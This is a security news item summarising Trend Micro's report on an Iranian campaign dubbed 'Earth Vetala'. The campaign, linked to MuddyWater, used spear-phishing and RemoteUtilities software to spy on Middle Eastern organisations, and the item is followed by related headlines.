Security News > 2021 > March > Iranian Hackers Using Remote Utilities Software to Spy On Its Targets
Dubbed "Earth Vetala" by Trend Micro, the latest finding expands on previous research published by Anomali last month, which found evidence of malicious activity aimed at UAE and Kuwait government agencies by exploiting ScreenConnect remote management tool.
The cybersecurity firm linked the ongoing attacks with moderate confidence to a threat actor widely tracked as MuddyWater, an Iranian hacker group known for its offensives primarily against Middle Eastern nations.
Earth Vetala is said to have leveraged spear-phishing emails containing embedded links to a popular file-sharing service called Onehub to distribute malware that ranged from password dumping utilities to custom backdoors, before initiating communications with a command-and-control server to execute obfuscated PowerShell scripts.
The links themselves direct victims to a.ZIP file that contains a legitimate remote administration software developed by RemoteUtilities, which is capable of downloading and uploading files, capturing screenshots, browsing files and directories, and executing and terminating processes.
Noting that the tactics and techniques between the two campaigns that distribute RemoteUtilities and ScreenConnect are broadly similar, Trend Micro said the targets of the new wave of attacks are mainly organizations located in Azerbaijan, Bahrain, Israel, Saudi Arabia, and the UAE. In one particular instance involving a compromised host in Saudi Arabia, the researchers found that the adversary tried to unsuccessfully configure SharpChisel - a C# wrapper for a TCP/UDP tunneling tool called chisel - for C2 communications, before downloading a remote access tool, a credential stealer, and a PowerShell backdoor capable of executing arbitrary remote commands.
"While it possesses remote access capabilities, the attackers seem to lack the expertise to use all of these tools correctly. This is unexpected since we believe this attack is connected to the MuddyWater threat actors - and in other connected campaigns, the attackers have shown higher levels of technical skill."
News URL
Related news
- Iranian hackers now exploit Windows flaw to elevate privileges (source)
- Iranian hackers act as brokers selling critical infrastructure access (source)
- Iranian Hackers Use "Dream Job" Lures to Deploy SnailResin Malware in Aerospace Attacks (source)
- Iranian Hackers Deploy WezRat Malware in Attacks Targeting Israeli Organizations (source)